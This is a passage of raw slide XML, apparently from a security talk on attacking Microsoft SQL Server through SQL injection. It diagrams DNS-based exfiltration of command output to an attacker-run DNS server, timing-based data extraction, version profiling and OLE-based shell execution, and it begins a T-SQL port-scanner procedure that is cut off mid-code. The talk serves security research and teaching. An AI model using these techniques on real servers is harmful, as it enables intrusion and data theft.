          <a:xfrm>
            <a:off x="691994" y="5334000"/>
            <a:ext cx="7994806" cy="10667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a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic setup: attacker has SQL injection vulnerability into  SQL server, as ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="691994" y="5334000"/>
            <a:ext cx="7994806" cy="10667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a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command is run on SQL server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rounded Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="691994" y="5334000"/>
            <a:ext cx="7994806" cy="10667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a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Output is produced</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="3074432"/>
            <a:ext cx="4572000"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000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Windows IP Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Ethernet adapter Local Area Connection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>   Connection-specific DNS Suffix  . :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>   IP Address. . . . . . . . . . . . : 192.168.0.47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>   Subnet Mask . . . . . . . . . . . : 255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>   Default Gateway . . . . . . . . . : 192.168.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rounded Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="691994" y="5334000"/>
            <a:ext cx="7994806" cy="10667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a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Output is stored in DB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Right Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062163" y="1701800"/>
            <a:ext cx="5346700" cy="74930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Second injection string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="691994" y="5334000"/>
            <a:ext cx="7994806" cy="10667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a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Grab limited chunk of data from temporary table, convert to hex, tack on domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="3074432"/>
            <a:ext cx="45720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000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>57696e646f777320495020436f6e66696775726174696f6e.sensepost.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="1037511"/>
            <a:ext cx="2057400" cy="24622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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Windows IP Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Left Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19656234">
            <a:off x="4647334" y="2042471"/>
            <a:ext cx="2917616" cy="293607"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rounded Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="691994" y="5334000"/>
            <a:ext cx="7994806" cy="10667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a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Initiate DNS request with encoded data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23" descr="server-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="919163" y="3319463"/>
            <a:ext cx="889000" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596900" y="4303197"/>
            <a:ext cx="1447800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker DNS Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Curved Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2044700" y="3319463"/>
            <a:ext cx="5346700" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="889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044699" y="3766929"/>
            <a:ext cx="5888037" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>57696e646f777320495020436f6e66696775726174696f6e.sensepost.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rounded Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="691994" y="5334000"/>
            <a:ext cx="7994806" cy="10667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a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Request is received and converted into original form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1413589"/>
            <a:ext cx="2057400" cy="24622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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Windows IP Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Couri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23" presetClass="exit" presetSubtype="32" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>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10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1"/>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25"/>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9"/>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9" grpId="1" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="13" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="1" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="1" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="1" animBg="1"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="1" animBg="1"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="25" grpId="1"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="29" grpId="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="31"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squeeza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> demo</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Squeeza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: timing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Weaponised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> SQL server content extraction through timing attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data broken up into chunks, bits extracted one at a time through timing differences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Which meant:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Didn’t need an explicit return channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not absolutely reliable, but good enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many cups of coffee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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Profiling SQL servers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want to know which SQL server version we’re dealing with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Features added and removed between releases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2005 removed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_execresultset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, removed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_getfiledetails</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2005 added stored procedure creation functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common problem with a number of solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>select @@version, choose return channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What about other methods?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Look for new/removed tables/stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>procs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Look for new SQL syntax</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OLE’ thing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In 2002, Chris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Anley’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> paper discussed OLE object instantiation and execution from T-SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Demo’ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file reading/writing, shell execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Maybe this got lost in the rest of the goodness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t see too much OLE integration into injection tools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Growing OLE’ together</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In 6 years, not much has changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can still use OLE objects (another route for ActiveX object exploitation?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why this route?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safe for scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Killbits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OLE integration deserves more focus in injection payloads</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Something OLE’, something new</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL-based port scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basis is “MSXML2.ServerXMLHTTP” object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used to retrieve XML data from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webserver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Installed with IE, IIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two versions on win2k3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can specify then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>IP:port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of the target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webserver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Return values differ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>epending on whether a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is listening or not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SQL port scanner</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can tell if ports are open or closed/filtered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even better, basic protocol fingerprinting since we’re also told if a legitimate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> answered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But how to differentiate between closed and filtered?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same way everyone else does (mostly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Timing and timeouts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setTimeouts</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probeip(ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, port)</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pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>CREATE PROCEDURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>probeip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> @host VARCHAR(50), @port VARCHAR(5)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>AS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>BEGIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>DECLARE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
